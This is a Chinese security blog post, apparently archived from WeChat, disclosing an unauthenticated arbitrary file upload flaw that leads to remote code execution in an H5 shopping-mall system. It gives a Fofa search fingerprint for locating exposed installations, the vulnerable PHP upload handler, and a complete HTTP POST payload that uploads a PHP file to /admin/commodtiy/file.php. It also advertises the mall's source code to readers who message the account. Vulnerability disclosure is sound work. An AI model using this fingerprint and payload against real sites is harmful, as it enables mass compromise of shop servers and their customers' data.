[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247519816&idx=1&sn=74414bf876b016b3efafca086603e4dd&chksm=ce22d9f0f95550e6234cffca5e7008763bf538a48deb8fd6e500060c7364075ea9975ab9a90f&scene=21#wechat_redirect)
- # 如何防护0-day漏洞攻击
#
- # 【风险提示】OpenSSH 远程代码执行漏洞CVE-2024-6387
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247519305&idx=1&sn=7611fef93e007338b538c92d84cb717a&chksm=ce22dbf1f95552e76ab3441d0d4364fc1cb55ec1b199919ad13735577fc2f1e0e6d9cb34a75b&scene=21#wechat_redirect)
- # 【漏洞预警】Apache HTTP Server 信息泄露漏洞
[](http://mp.weixin.qq.com/s?__biz=Mzg2MDg0ODg1NQ==&mid=2247517435&idx=2&sn=f886ee4cac082229881224ea2f978c07&chksm=ce22d343f9555a556633469c8cf9a18ed91f34ea3c04f90939b9c9a120385f6e724990b5fa4d&scene=21#wechat_redirect)
- # 红队视角2024 | 国家级攻防演练100+必修高危漏洞合集(可下载)
#
- # 【干货】2024 攻防演练 · 期间 | 需关注的高危漏洞清单
**【原文来源FreeBuf****】**![](https://mmbiz.qpic.cn/mmbiz_gif/BWicoRISLtbP7Bh21K85KEkXX7ibWmLdM2eafpPicoTqk37LEVMUKD1JuAic4FF4KB7jP4oFTricyMwvj5VUZZ824ww/640?wx_fmt=gif "")
![](https://mmbiz.qpic.cn/mmbiz_jpg/BWicoRISLtbNzlia8CP45sjgLJgia5Y22hx8khBeShnAzCPwsfqeIVKkpFDhUoMUWMicq6toR2TSUmgBpgzZQHEAHw/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/mmbiz_png/BWicoRISLtbPFKyibwduMibC35MsIhibgZEAibwSyVRz7FKt3xa1UK61fXXCCUKllCXFrLdnBqcmgiaKeSxGrWT0RtYw/640?wx_fmt=png "")

View File

@ -0,0 +1,103 @@
# 某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)
原创 Mstir 星悦安全 2024-11-18 03:39
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/lSQtsngIibibSOeF8DNKNAC3a6kgvhmWqvoQdibCCk028HCpd5q1pEeFjIhicyia0IcY7f2G9fpqaUm6ATDQuZZ05yw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
点击上方
蓝字关注我们 并设为
星标
## 0x00 前言
**该源码采用HTML5技术开发可以完美适配各种移动设备以及iOS和Android系统。同时易支付接口更为商家提供了便捷的交易功能让顾客可以轻松通过手机进行网络支付享受到更加便捷的购物体验。**
**该源码界面设计十分简洁、清爽,同时还保证了购物流程的顺畅和简便。无论是主页、分类页面、商品详情页面,都给人留下了很好的第一印象。**
**Fofa指纹:"/src/images/gg.png" && "/public/goods.php"**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5dgt3lS90YV5owichy0LsYwpTtyF3DnibTKM22xLLND31aLwT4ggLeZBwMbuIfzkRv7DATkQNSF7jzw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5dgt3lS90YV5owichy0LsYwpgXOQIkn0WH9U2A0VQSe23HtsEWY0U5eQwy0TiaDYxIVuGQCg1J4uYUw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5dgt3lS90YV5owichy0LsYwpNFZiau02Gm0tKAI6UhZOSOQ713tnzYbtJYiayicyvIGz7BArNbOoTShcw/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
## 0x01 漏洞分析&复现
位于 /admin/commodtiy/file.php 文件中存在move_uploaded_file 函数上传文件,且未有任何过滤,导致漏洞产生.```
<?php
if($_GET['upload']){
// 获取上传的文件名
$file = pathinfo($_FILES['file']['name']);
//获取上传文件的后缀
$file_hz= $file['extension'];
//以当前时间来拼接一个文件名
$file_date = date('Ymdhis');
$file_name = $file_date . '.' . $file_hz;
//判断当前目录下是否有upload这个文件没有就创建一个
$path = 'upload/';
$file_path=file_exists($path);
if(!$file_path){
mkdir($path);
}
//如果有上传文件为就执行下面代码
if(is_uploaded_file($_FILES['file']['tmp_name'])){
//将上传的临时tmp文件移动到指定位置并且已指定的file_name来命名文件成功就echo输出移动后的文件位置。
if(move_uploaded_file($_FILES['file']['tmp_name'],$path.$file_name)){
// echo "当前文件保存路径为:".$_FILES['file']['tmp_name'],$path.;
// echo '文件上传成功';
echo json_encode('/admin/commodtiy/upload/'.$file_name);
} else {
echo '文件上传失败';
}
} else {
echo '文件不存在';
}
}
?>
```
**Payload:**
```
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=------WebKitFormBoundary03rNBzFMIytvpWhy
Cookie: Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1731328644; PHPSESSID=nbkea3f11cmfad1qhfcm29aqn7; thinkphp_show_page_trace=0|0; bh_myaction=Index%2Findex; _ga=GA1.1.2095806093.1731475984; _gid=GA1.1.546134623.1731475984; yzm=G2DD
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/admin/commodtiy/file.php?upload
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
```
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5cvwmLNfqaPa6yKjIvibWMKoFsS3YcvaGF9KXweXdzRTwWPJDNh3B2sOgQsT5eoSjh797ccuCoBkYQ/640?wx_fmt=other&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5cvwmLNfqaPa6yKjIvibWMKo9FNrsOMs9614Dn8exDyVrDxhiadhQpsiaAMyWAPAhF8WVczdprR0ICWA/640?wx_fmt=other&from=appmsg "")
## 0x02 源码下载
**标签:代码审计0day渗透测试系统通用0day闲鱼转转**
**购物商城源码关注公众号发送 241117 获取!**
**进星悦安全公开群添加下方VX 备注 "进群"**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/uicic8KPZnD5fr0w5NqA8l0xH4mcpTbkGK5v6wyHcicibH4ia14Wq1n0fPvn1C0QPAe98oVABtMWOA8nRPfHia0YqAFw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**免责声明:****文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!**

File diff suppressed because one or more lines are too long